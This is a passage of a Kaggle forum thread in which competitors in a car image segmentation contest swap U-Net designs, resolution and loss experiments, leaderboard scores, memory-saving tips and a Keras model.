      "content": "<p>what does 0.988, 0.990, 0.992, 0.996 look like? I upload some files for your reference.\nThese are train errors i got on my train images.</p>\n\n<p>From these images, the errors are can be corrected if you know something about the car model (e.g. the bumper is black and has to careful not to confuse with shadow). Dimension of the car might help.</p>\n\n<p>maybe this is how meta data can be used.</p>",
      "votes": null,
      "replies": [
        {
          "id": 211115,
          "author_name": "netphone",
          "author_url": "",
          "post_date": "08/08/2017 04:12:25",
          "content": "<p>This is excellent!!</p>",
          "votes": null,
          "replies": []
        }
      ]
    },
    {
      "id": 208447,
      "author_name": "subbytech",
      "author_url": "",
      "post_date": "07/29/2017 20:10:33",
      "content": "<p>Hi Heng CherKeng! </p>\n\n<p>You're involvement in the public forums is simply awesome! I love how you share a LOT of comp. vision type models (particularly in PyTorch)! </p>\n\n<p>I was wondering whether you can post your implementation on Github, so that we can view the code online... </p>\n\n<p>Great work, keep it up ;) In fact, I'm actually planning to learn PyTorch via this competition, starting from your code. Good luck! ;))</p>",
      "votes": null,
      "replies": [
        {
          "id": 208494,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "07/30/2017 00:53:13",
          "content": "<p>be careful of those imagenet models. the py files are modified (the naming of the layers had changed) and may not work if you pretrained downloaed from the pytorch repository. you may wan to use the original imagenet py model from the pytorch repository.</p>\n\n<p>i will post the modiifed pretrained models later</p>",
          "votes": null,
          "replies": []
        }
      ]
    },
    {
      "id": 208448,
      "author_name": "crailtap",
      "author_url": "",
      "post_date": "07/29/2017 20:11:12",
      "content": "<p>Increasing Image Size helps, currently using 256 x256 with Keras U-net. </p>\n\n<p>128 x 128 -&gt; 98.5</p>\n\n<p>256 x 256 -&gt; 99.1</p>",
      "votes": null,
      "replies": [
        {
          "id": 208490,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "07/30/2017 00:46:34",
          "content": "<p>thanks for the information! it helps</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 208775,
          "author_name": "jandjenter",
          "author_url": "",
          "post_date": "07/31/2017 02:51:09",
          "content": "<p>I got 0.993 with 320x480 (1/4 scale) with Keras U-net\nI can see 1 to 4 pixel discrepancy around car boundary as expected. </p>\n\n<p>I also attempt the full-scale image, but it seems to be worse at least for first a few epoch - may be I need more U-net depth, but it becomes too slow to run.</p>",
          "votes": null,
          "replies": []
        }
      ]
    },
    {
      "id": 208479,
      "author_name": "jackkwok",
      "author_url": "",
      "post_date": "07/29/2017 23:18:53",
      "content": "<p>Thanks Heng for sharing. I am hoping to reproduce this with Keras as I don't have PyTorch.</p>\n\n<p>How long was the training time? <br>\nWhat was the batch size?</p>",
      "votes": null,
      "replies": [
        {
          "id": 208852,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "07/31/2017 09:17:20",
          "content": "<p>you can check the post below</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 209100,
          "author_name": "emohit",
          "author_url": "",
          "post_date": "08/01/2017 07:26:50",
          "content": "<p>@jackkwok : Will you share the code once you are done with converting this to keras</p>",
          "votes": null,
          "replies": []
        }
      ]
    },
    {
      "id": 208492,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "07/30/2017 00:48:45",
      "content": "<p>some segmentation model for pytorch which you can used: </p>\n\n<p><a href=\"https://github.com/bodokaiser/piwise\">https://github.com/bodokaiser/piwise</a></p>\n\n<p><a href=\"https://github.com/meetshah1995/pytorch-semseg\">https://github.com/meetshah1995/pytorch-semseg</a></p>\n\n<p>some discussion</p>\n\n<p><a href=\"https://discuss.pytorch.org/t/semantic-segmentation-perform-bad/1892/6\">https://discuss.pytorch.org/t/semantic-segmentation-perform-bad/1892/6</a></p>\n\n<p>you may want to try these. i think their implementations may be better than mine.</p>",
      "votes": null,
      "replies": [
        {
          "id": 208521,
          "author_name": "shanxu",
          "author_url": "",
          "post_date": "07/30/2017 04:55:16",
          "content": "<p>It was very generous of you to share your work. Your work is fantastic. I  just wonder if you have already look at CRF-RNN <a href=\"https://github.com/torrvision/crfasrnn\">https://github.com/torrvision/crfasrnn</a> which might be more promising? </p>",
          "votes": null,
          "replies": []
        }
      ]
    },
    {
      "id": 208595,
      "author_name": "yashk2810",
      "author_url": "",
      "post_date": "07/30/2017 10:23:37",
      "content": "<p>If you are training your model with 128x128 size pictures, then how will you predict the test images with size 1918x1280 since the model expects a tensor of (None, 128, 128, 3)?</p>",
      "votes": null,
      "replies": [
        {
          "id": 208597,
          "author_name": "crailtap",
          "author_url": "",
          "post_date": "07/30/2017 10:26:39",
          "content": "<p>e.g. the predicted mask is 128 x 128 and now you resize the image up to 1918x1280. </p>\n\n<p>Depending on the resize function you can loose information, so training on bigger images should in general yield better results.</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 208598,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "07/30/2017 10:26:54",
          "content": "<p>resize image and ground truth mask to NxN at train. predict NxN mask at test. then upscale NxN to  1918x1280 . Not the best solution, but it is a start</p>",
          "votes": null,
          "replies": []
        }
      ]
    },
    {
      "id": 208639,
      "author_name": "ceperaang",
      "author_url": "",
      "post_date": "07/30/2017 12:44:33",
      "content": "<p>Works fine with 480*720 patches ^_^ </p>",
      "votes": null,
      "replies": [
        {
          "id": 208640,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "07/30/2017 12:45:59",
          "content": "<p>thanks for the infor!</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 208645,
          "author_name": "crailtap",
          "author_url": "",
          "post_date": "07/30/2017 12:58:20",
          "content": "<p>which batch size do you train? </p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 208648,
          "author_name": "ceperaang",
          "author_url": "",
          "post_date": "07/30/2017 13:13:13",
          "content": "<p>batch_size = 4 with Adam optimizer, trained overnight with 50 epochs, lr divided by 10 on 10, 20 and 50 epoch. </p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 208649,
          "author_name": "crailtap",
          "author_url": "",
          "post_date": "07/30/2017 13:23:04",
          "content": "<p>thxs will test ur image size this night :D</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 208652,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "07/30/2017 13:55:43",
          "content": "<p>note that the prediction size can be bigger than input size. it is like super resolution.</p>\n\n<p>e.g. prediction_mask (input_128x128) = mask_256x256</p>\n\n<p>change bilinear upsampling layer to learnable deconvolution layer (aka transpose convolution)</p>\n\n<p>...</p>\n\n<p>also, you can start to modify your unet to be like:</p>\n\n<p>input_NxN --&gt; [ resnet ] --&gt; resNet_features_FxF --&gt; [uNet] --&gt; mask_KxK </p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 208672,
          "author_name": "ceperaang",
          "author_url": "",
          "post_date": "07/30/2017 14:45:28",
          "content": "<p>Another way could be to split images into smaller patches without downscaling. For example, we could split 1920*1280 into 720*480 patches with small overlap and that way it will be possible to train network with full resolution images</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 208674,
          "author_name": "ceperaang",
          "author_url": "",
          "post_date": "07/30/2017 14:49:08",
          "content": "<p>Managed to run it with 1088x720 and batch 2. Still 3.2x downsampling.</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 208676,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "07/30/2017 14:57:34",
          "content": "<p>&gt;&gt;Another way could be to split images into smaller patches</p>\n\n<p>i have about the same idea. Please see attachment picture.</p>\n\n<p><img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/208677/6950/high.png\" alt=\"enter image description here\" title=\"\"></p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 208678,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "07/30/2017 15:09:52",
          "content": "<p>here is another idea. </p>\n\n<p>Say if we we are given 100x100 mask as ground truth. During training, we upsize the ground truth to 200x200 and train a network to predict 200x200. Then we download size 200x200 to 100x100 as final prediction results. This may has the 'effect' of averaging neighboring pixel predictions to predict current pixel.</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 208681,
          "author_name": "ceperaang",
          "author_url": "",
          "post_date": "07/30/2017 15:17:47",
          "content": "<p>Don't know, seems too complex to me. Advantage of end-to-end Unet is that it could have both local and global information (i.e. it can predict where the car is and also detect very precise boundary using this information). If we select very small patches near boundary there will be less context information (it is very hard to understand what is in small patch -- is it boundary of a car or boundary of letter in the background and so on)</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 208682,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "07/30/2017 15:19:17",
          "content": "<p>the patches can be big. e.g 25% of original image size.</p>\n\n<p>results of low resolution prediction (and maybe location of patch encoded as pixel information e.g. via distance transform) can be added as input to the high resolution network as well.</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 209187,
          "author_name": "creatrol",
          "author_url": "",
          "post_date": "08/01/2017 13:37:21",
          "content": "<p>I'm also using adam, I'm wondering how you set the initial super parameters?</p>",
          "votes": null,
          "replies": []
        }
      ]
    },
    {
      "id": 208647,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "07/30/2017 13:00:42",
      "content": "<p>some early experiment results</p>\n\n<p><img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/208647/6946/exp.png\" alt=\"enter image description here\" title=\"\"></p>\n\n<p><img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/208647/6951/exp2.png\" alt=\"enter image description here\" title=\"\"></p>",
      "votes": null,
      "replies": []
    },
    {
      "id": 208677,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "07/30/2017 14:57:55",
      "content": "<p>&lt;</p>",
      "votes": null,
      "replies": []
    },
    {
      "id": 208703,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "07/30/2017 17:41:11",
      "content": "<p>new experiment results. surprised that 128x128 can achieve LB 0.989. Unet_1 = my initial design unet.  Unet_2 = design from Keras reference. Tips:</p>\n\n<ul>\n<li>train your CNN long enough</li>\n<li><p>design your unet properly ... try different number of filters</p>\n\n<p><img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/208703/6952/exp3.png\" alt=\"enter image description here\" title=\"\"></p></li>\n</ul>",
      "votes": null,
      "replies": [
        {
          "id": 208708,
          "author_name": "ceperaang",
          "author_url": "",
          "post_date": "07/30/2017 17:57:41",
          "content": "<p>Awesome results! How about using 192*128 -- it will be the same proportions as original image. Also, I'd suggest using cv2.INTERP_AREA instead of default. It will make downsampled images more \"smooth\" without aliasing effects. I think it will allow to break into 0.99+ area.</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 208722,
          "author_name": "melgor",
          "author_url": "",
          "post_date": "07/30/2017 18:59:51",
          "content": "<p>I have a question about difference between LB score and validation score.\nI have trained model on 256x256 images. I get validation Dice Error ~0.991.</p>\n\n<p>But when I resize prediction to full resolution, at validation  set I get 0.986 (which is consistent with my LB score).\nI'm thinking if such big drop is sth natural or  I screwed the up-sampling part for prediction (I just use resize and threshold to have only binary values). After my analyse, look like my model learned nice the down-sampled masks, but also with all down-sample artifacts. Or I have sth wrong in my pipeline,\nHow does you pipeline look like?</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 208732,
          "author_name": "ceperaang",
          "author_url": "",
          "post_date": "07/30/2017 19:48:41",
          "content": "<p>This is fine. Your model learns downsampled masks very carefully but they are still downsampled and don't contain all the information of full-sized masks no matter how you will upsample predictions. I got higher score by using 720*480 masks. Currently training 1088x720 ^_^</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 208798,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "07/31/2017 05:12:11",
          "content": "<p>different resizing (bilinear, cubic, area, learnable) will be my next experiments. Also I will be trying scling without changing the aspect of the original image. I will report results later. Thanks for the hints and  advice!</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 208869,
          "author_name": "miaouhoho",
          "author_url": "",
          "post_date": "07/31/2017 12:29:03",
          "content": "<p>Hello Heng, </p>\n\n<p>Do you think resize image's extension will affect the score? <br>\nIs it better to resize and write as jpg format than png ?</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 208886,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "07/31/2017 13:58:06",
          "content": "<p>@Bartek</p>\n\n<p>let ( downsize(x), downsize(y_hat) ) be an train sample, and  p be output prediction of CNN. </p>\n\n<p>Did you threshold(upsize(threshold(p))) or threshold(upsize(p)) for submission? I use threshold(upsize(p)) but i haven't compare which is better </p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 208891,
          "author_name": "crailtap",
          "author_url": "",
          "post_date": "07/31/2017 14:09:16",
          "content": "<p>When using bigger images, how do you guys save the predictions? Currently i'm using numpy array but with bigger image size my 32gb ram gets memory error.</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 208910,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "07/31/2017 14:50:26",
          "content": "<p>my ram is 128 gb. Your prediction comes from CNN, which you can save at every e.g. 1000 iterations. your results will be in chunks of 1000. 512x512 prediction mask (float32) is about 104 GB when saves as npy file.</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 208912,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "07/31/2017 14:52:01",
          "content": "<p>@Eugene  I am not sure but i think image compression should have negligible effects</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 208914,
          "author_name": "firolino",
          "author_url": "",
          "post_date": "07/31/2017 14:53:59",
          "content": "<p>You could virtually increase your memory size by using a swap file:</p>\n\n<pre><code>#!/bin/bash\n# swap-create: creates 20 GB swap file\n\nSWAP_FILE=${HOME}/swapfile\n\nsudo dd if=/dev/zero of=${SWAP_FILE} bs=512M count=40\nsudo mkswap ${SWAP_FILE}\nsudo chmod 600 ${SWAP_FILE}\nsudo swapon ${SWAP_FILE}\n</code></pre>",
          "votes": null,
          "replies": []
        },
        {
          "id": 208933,
          "author_name": "melgor",
          "author_url": "",
          "post_date": "07/31/2017 15:34:20",
          "content": "<p>I have checked last @Heng CherKeng script and it really produce 0.995 score using 512 images, thanks! Now I'm ready to find a bug in my code:)</p>\n\n<p>About memory consumption when predicting I resolved it by using uint8 format instead of float32\nSo I get prediction after sigmoid function, multiply them by 255. and convert to uint8.\nAfter resizing I threshold them by 128. \nThen I use ~30GB of memory for making a prediction (having 32GB). Saved all mask for 100k images takes 25 GB (so 4x less than float32). As I have same score at LB like Heng, look like it does not hurt performance </p>\n\n<p>About cropping the removing the background from images, I think that is very good idea, which I was thinking about too.\nThe simple two-step idea is best. And it provide bigger car images at same resolution of input image. But I would have left some background around the car to enable random crop and have more information about background around car. </p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 208979,
          "author_name": "phanisrikanth",
          "author_url": "",
          "post_date": "07/31/2017 19:31:31",
          "content": "<p>You could save the numpy array in bcolz format. It's one of the fastest and a cheap way of saving numpy arrays on disk. Some utility functions to save and load bcolz arrays are here: <a href=\"https://github.com/fastai/courses/blob/master/deeplearning1/nbs/utils.py#L175-L181\">https://github.com/fastai/courses/blob/master/deeplearning1/nbs/utils.py#L175-L181</a></p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 209754,
          "author_name": "miaouhoho",
          "author_url": "",
          "post_date": "08/03/2017 09:47:34",
          "content": "<p>@Barek \nI have tried your method and it works well for me. <br>\nI don't have to save a 104GB numpy array on my local anymore. <br>\nInstead the size shrink to only 26GB when the uint8 array of size 100000x512x512 is saved. <br>\nHowever, I have used another way to allocate numpy array first by using <code>np.memmap(outdir, dtype=np.uint8, mode='w+', shape=(100064,512,512))</code>. <br>\nBy doing this I don't have to read the entire array into my memory. <br>\n<a href=\"https://docs.scipy.org/doc/numpy/reference/generated/numpy.memmap.html\">https://docs.scipy.org/doc/numpy/reference/generated/numpy.memmap.html</a></p>",
          "votes": null,
          "replies": []
        }
      ]
    },
    {
      "id": 208771,
      "author_name": "",
      "author_url": "",
      "post_date": "07/31/2017 02:03:06",
      "content": "<p>Does DA useful ? I'm trying to use rot and flip,but the result become more worse.</p>",
      "votes": null,
      "replies": [
        {
          "id": 208774,
          "author_name": "jandjenter",
          "author_url": "",
          "post_date": "07/31/2017 02:44:08",
          "content": "<p>Rotated image is far from val/test image, so I guess it is not a good way. I haven't tried but horizontal flip, horizonal/vertical pixel shift and brightness/contrast change should be good..</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 208779,
          "author_name": "",
          "author_url": "",
          "post_date": "07/31/2017 03:30:16",
          "content": "<p>I think using DA will add some noise.It can improve the robust of the model sometimes,but in this competition we can get 0.99+ precision,so maybe the noise is harmful.</p>",
          "votes": null,
          "replies": []
        }
      ]
    },
    {
      "id": 208795,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "07/31/2017 05:01:32",
      "content": "<p>i am now preparing the experiment write up and code for next release for 0.995 results. Here is a quick summary of my new experiments:</p>\n\n<ol>\n<li><p>using bilinear upsampling is better than deconvolution layer in unet (which i don't know why ... i suspect overfitting)</p></li>\n<li><p>different sizes on LB: 128x128=0.989(batch=32), 256x256=0.992(30), 512x512=0.995(16)</p></li>\n<li><p>augmentation. I use scale+shift. adding non-uniform scaling (change of aspect) worsen the results a little.</p></li>\n</ol>\n\n<p>it seems that everyone now knows how to move towards 0.999. the battle now is who has the most gpu resources. imagine if i can train in full resolution with multi-gpus!</p>\n\n<h2>note: the results are non conclusive. it is possible that you get different results. my results are only for reference. for details of experiments, please wait for my next post.</h2>\n\n<p>Updated! The reason that deconvolution filter didn't work well could be becuase i forget to initialise them with bilinear weights. I will check that later.</p>",
      "votes": null,
      "replies": [
        {
          "id": 208824,
          "author_name": "emohit",
          "author_url": "",
          "post_date": "07/31/2017 07:16:36",
          "content": "<p>Hey , Can you provide the Keras version of Unet.\nThanks in advance</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 208834,
          "author_name": "",
          "author_url": "",
          "post_date": "07/31/2017 07:42:42",
          "content": "<p>the bigger size,the higher LB.</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 210075,
          "author_name": "miaouhoho",
          "author_url": "",
          "post_date": "08/04/2017 08:38:33",
          "content": "<p>Reply for your first doubt <br>\n1. using bilinear upsampling is better than deconvolution layer in unet (which i don't know why ... i suspect overfitting) <br>\nIt might be that deconvolutions tend to introduce characteristic artifacts, you can check out this. <a href=\"https://distill.pub/2016/deconv-checkerboard/\">https://distill.pub/2016/deconv-checkerboard/</a></p>",
          "votes": null,
          "replies": []
        }
      ]
    },
    {
      "id": 208839,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "07/31/2017 08:05:55",
      "content": "<p>inspired by @ironbar post: <a href=\"https://www.kaggle.com/ironbar/getting-a-meaning-of-the-score\">https://www.kaggle.com/ironbar/getting-a-meaning-of-the-score</a>, i try to find the limits of using training labels of different sizes. Conclusion is that \"size does matters\" !</p>\n\n<p>Here are the results:\n <img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/208839/6954/size.png\" alt=\"enter image description here\" title=\"\"></p>",
      "votes": null,
      "replies": [
        {
          "id": 210117,
          "author_name": "firolino",
          "author_url": "",
          "post_date": "08/04/2017 11:27:18",
          "content": "<p>After reading <a href=\"http://tanbakuchi.com/posts/comparison-of-openv-interpolation-algorithms/\">http://tanbakuchi.com/posts/comparison-of-openv-interpolation-algorithms/</a> I've checked the best interpolation method for our masks again with N=500, width=384 and height=256:\n<img src=\"http://i.imgur.com/hlCbamW.png\" alt=\"Interpolation Comparision\" title=\"\"></p>",
          "votes": null,
          "replies": []
        }
      ]
    },
    {
      "id": 208843,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "07/31/2017 08:44:47",
      "content": "<p>updated. use this with code release '07-31'</p>\n\n<p><img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/208843/6955/exp4.png\" alt=\"enter image description here\" title=\"\"></p>",
      "votes": null,
      "replies": []
    },
    {
      "id": 208849,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "07/31/2017 09:07:38",
      "content": "<p>comparing 128,256,512 unet. It seems that 32 epoch is not optimum. Also there is no overfitting. Then green mask is example of prediction on test image. </p>\n\n<p><img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/208849/6956/exp5.png\" alt=\"enter image description here\" title=\"\"></p>",
      "votes": null,
      "replies": [
        {
          "id": 209193,
          "author_name": "brianshaler",
          "author_url": "",
          "post_date": "08/01/2017 14:04:46",
          "content": "<p>Do you know what is causing the spots in the wheels? Is it the training data?</p>\n\n<p>I have only noticed one image where the manually created mask trimmed in between the wheel's spokes, but I haven't reviewed enough images to know if it is a common or rare issue.</p>",
          "votes": null,
          "replies": []
        }
      ]
    },
    {
      "id": 208850,
      "author_name": "dys129",
      "author_url": "",
      "post_date": "07/31/2017 09:09:37",
      "content": "<p>You might also find this useful: <a href=\"https://github.com/mrgloom/awesome-semantic-segmentation\">https://github.com/mrgloom/awesome-semantic-segmentation</a></p>\n\n<p>It contains links to all the papers and implementations (not only in pytorch) of segmentation networks.</p>",
      "votes": null,
      "replies": []
    },
    {
      "id": 208855,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "07/31/2017 09:35:56",
      "content": "<p>Next experiment plans:</p>\n\n<p>baseline system:  using as 256x256 input and predict 256x256.</p>\n\n<p>comparsion system:</p>\n\n<pre><code> 1. Given 256x256 images, crop 128x128 for training and predict 128x128.  During testing, 256x256 is divided into overlapping 128x128  patches to do inference. The results are then combined. \n\n 2. Given 128x128 as input. Train to predict 256x256\n\n 3. Given 128x128 as input. Train to predict 512x512. During testing, 512x512 prediction is downsized to 256x256.\n</code></pre>",
      "votes": null,
      "replies": []
    },
    {
      "id": 208856,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "07/31/2017 11:06:41",
      "content": "<p>a possible solution?</p>",
      "votes": null,
      "replies": []
    },
    {
      "id": 208877,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "07/31/2017 12:59:18",
      "content": "<p>it is a new record!  LB score =0.990 for 128x128. The results of using Bce loss + dice loss, i.e. dual loss back propagated. The training iterations are reduced also.</p>\n\n<p><img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/208877/6962/bce_dice.png\" alt=\"enter image description here\" title=\"\"></p>",
      "votes": null,
      "replies": []
    },
    {
      "id": 208890,
      "author_name": "lnicalo",
      "author_url": "",
      "post_date": "07/31/2017 14:07:47",
      "content": "<p>I am using this competition to improve my skills in keras. I see the model shared in this thread has been written using pytorch. Is anyone using keras/tensorflow to write an equivalent model?</p>",
      "votes": null,
      "replies": [
        {
          "id": 209188,
          "author_name": "creatrol",
          "author_url": "",
          "post_date": "08/01/2017 13:39:41",
          "content": "<p>I'm working on tensorflow version</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 209480,
          "author_name": "lnicalo",
          "author_url": "",
          "post_date": "08/02/2017 12:42:18",
          "content": "<p>I am struggling to replicate the performance ~0.99xx with keras. Only getting ~0.97x after 20 epochs with 8 batch size\nFind below the model in keras</p>\n\n<pre><code>inputs = Input((img_rows, img_cols, 3))\nconv1 = Conv2D(16, (3, 3), activation='relu', padding='same', name = 'layer1.1')(inputs)\nconv1 = BatchNormalization()(conv1)\nconv1 = Conv2D(16, (3, 3), activation='relu', padding='same', name = 'layer1.2')(conv1)\nconv1 = BatchNormalization()(conv1)\npool1 = MaxPooling2D(pool_size=(2, 2), name = 'layer1.3')(conv1)\n\nconv2 = Conv2D(32, (3, 3), activation='relu', padding='same', name = 'layer2.1')(pool1)\nconv2 = BatchNormalization()(conv2)\nconv2 = Conv2D(32, (3, 3), activation='relu', padding='same', name = 'layer2.2')(conv2)\nconv2 = BatchNormalization()(conv2)\npool2 = MaxPooling2D(pool_size=(2, 2), name = 'layer2.3')(conv2)\n\nconv3 = Conv2D(64, (3, 3), activation='relu', padding='same', name = 'layer3.1')(pool2)\nconv3 = BatchNormalization()(conv3)\nconv3 = Conv2D(64, (3, 3), activation='relu', padding='same', name = 'layer3.2')(conv3)\nconv3 = BatchNormalization()(conv3)\npool3 = MaxPooling2D(pool_size=(2, 2), name = 'layer3.3')(conv3)\n\nconv4 = Conv2D(128, (3, 3), activation='relu', padding='same', name = 'layer4.1')(pool3)\nconv4 = BatchNormalization()(conv4)\nconv4 = Conv2D(128, (3, 3), activation='relu', padding='same', name = 'layer4.2')(conv4)\nconv4 = BatchNormalization()(conv4)\npool4 = MaxPooling2D(pool_size=(2, 2), name = 'layer4.3')(conv4)\n\nconv5 = Conv2D(256, (3, 3), activation='relu', padding='same', name = 'layer5.1')(pool4)\nconv5 = BatchNormalization()(conv5)\nconv5 = Conv2D(256, (3, 3), activation='relu', padding='same', name = 'layer5.2')(conv5)\nconv5 = BatchNormalization()(conv5)\npool5 = MaxPooling2D(pool_size=(2, 2), name = 'layer5.3')(conv5)\n\nconv6 = Conv2D(512, (3, 3), activation='relu', padding='same', name = 'layer6.1')(pool5)\nconv6 = BatchNormalization()(conv6)\nconv6 = Conv2D(512, (3, 3), activation='relu', padding='same', name = 'layer6.2')(conv6)\nconv6 = BatchNormalization()(conv6)\npool6 = MaxPooling2D(pool_size=(2, 2), name = 'layer6.3')(conv6)\n\nconv7 = Conv2D(1024, (3, 3), activation='relu', padding='same', name = 'layer7.1')(pool6)\nconv7 = BatchNormalization()(conv7)\nconv7 = Conv2D(1024, (3, 3), activation='relu', padding='same', name = 'layer7.2')(conv7)\nconv7 = BatchNormalization()(conv7)\n\nup8 = concatenate([Conv2DTranspose(512, (2, 2), strides=(2, 2), padding='same', name = 'layer8.0')(conv7), conv6], axis=3, name = 'layer8.01')\nconv8 = Conv2D(512, (3, 3), activation='relu', padding='same', name = 'layer8.1')(up8)\nconv8 = BatchNormalization()(conv8)\nconv8 = Conv2D(512, (3, 3), activation='relu', padding='same', name = 'layer8.2')(conv8)\nconv8 = BatchNormalization()(conv8)\n\nup9 = concatenate([Conv2DTranspose(256, (2, 2), strides=(2, 2), padding='same', name = 'layer9.0')(conv8), conv5], axis=3, name = 'layer9.01')\nconv9 = Conv2D(256, (3, 3), activation='relu', padding='same', name = 'layer9.1')(up9)\nconv9 = BatchNormalization()(conv9)\nconv9 = Conv2D(256, (3, 3), activation='relu', padding='same', name = 'layer9.2')(conv9)\nconv9 = BatchNormalization()(conv9)\n\nup10 = concatenate([Conv2DTranspose(256, (2, 2), strides=(2, 2), padding='same', name = 'layer10.0')(conv9), conv4], axis=3, name = 'layer10.01')\nconv10 = Conv2D(256, (3, 3), activation='relu', padding='same', name = 'layer10.1')(up10)\nconv10 = BatchNormalization()(conv10)\nconv10 = Conv2D(256, (3, 3), activation='relu', padding='same', name = 'layer10.2')(conv10)\nconv10 = BatchNormalization()(conv10)\n\nup11 = concatenate([Conv2DTranspose(128, (2, 2), strides=(2, 2), padding='same', name = 'layer11.0')(conv10), conv3], axis=3, name = 'layer11.01')\nconv11 = Conv2D(128, (3, 3), activation='relu', padding='same', name = 'layer11.1')(up11)\nconv11 = BatchNormalization()(conv11)\nconv11 = Conv2D(128, (3, 3), activation='relu', padding='same', name = 'layer11.2')(conv11)\nconv11 = BatchNormalization()(conv11)\n\nup12 = concatenate([Conv2DTranspose(64, (2, 2), strides=(2, 2), padding='same', name = 'layer12.0')(conv11), conv2], axis=3, name = 'layer12.01')\nconv12 = Conv2D(64, (3, 3), activation='relu', padding='same', name = 'layer12.1')(up12)\nconv12 = BatchNormalization()(conv12)\nconv12 = Conv2D(64, (3, 3), activation='relu', padding='same', name = 'layer12.2')(conv12)\nconv12 = BatchNormalization()(conv12)\n\nup13 = concatenate([Conv2DTranspose(32, (2, 2), strides=(2, 2), padding='same', name = 'layer13.0')(conv12), conv1], axis=3, name = 'layer13.01')\nconv13 = Conv2D(32, (3, 3), activation='relu', padding='same', name = 'layer13.1')(up13)\nconv13 = BatchNormalization()(conv13)\nconv13 = Conv2D(32, (3, 3), activation='relu', padding='same', name = 'layer13.2')(conv13)\nconv13 = BatchNormalization()(conv13)\n\nconv14 = Conv2D(1, (1, 1), activation='sigmoid')(conv13)\n# conv14 = BatchNormalization()(conv14)\n\nmodel = Model(inputs=[inputs], outputs=[conv14])\n</code></pre>",
          "votes": null,
          "replies": []
        },
        {
          "id": 209652,
          "author_name": "ecobill",
          "author_url": "",
          "post_date": "08/02/2017 23:15:33",
          "content": "<p>my implementation here <a href=\"https://www.kaggle.com/ecobill/u-nets-with-keras/\">https://www.kaggle.com/ecobill/u-nets-with-keras/</a></p>",
          "votes": null,
          "replies": []
        }
      ]
    },
    {
      "id": 208927,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "07/31/2017 15:20:30",
      "content": "<p>yet another simple idea is to use initial low resolution mask prediction to get a bounding box of the car. They crop and resize the bounding box (with border) to some good size like 512x512. This reduces the the background and maximizes the object in the 512x512 input.</p>",
      "votes": null,
      "replies": []
    },
    {
      "id": 209122,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "08/01/2017 09:42:18",
      "content": "<p>yet another idea</p>",
      "votes": null,
      "replies": [
        {
          "id": 209520,
          "author_name": "bguberfain",
          "author_url": "",
          "post_date": "08/02/2017 14:33:08",
          "content": "<p>I didn't have time for this competition yet, but I was planning to take the approach you suggest: input all images rotations and output all masks at once.</p>\n\n<p>Other things to consider:</p>\n\n<ul>\n<li><p>Don't go too deep on UNet, as masks are placed more or less on the same region. Instead, replace the two deepest levels with a \"global convolution\" (a convolution with kernel size equal to the side of the image at that level). The number of filters should not be more than the number of cars. This way, we may reduce the number of parameters and probably create a viable 1024x1024 version.</p></li>\n<li><p>I'd suggest adding an \"upscale\" network to the workflow, after training and predicting the UNet. The input should be patches from original image stacked with the UNet output (channels R, G, B and Mask). These patches should always include border regions of mask (black and white pixels).</p></li>\n</ul>\n\n<p>Final note: I'd suggest reading this recent post about image segmentation thechniques:\n- <a 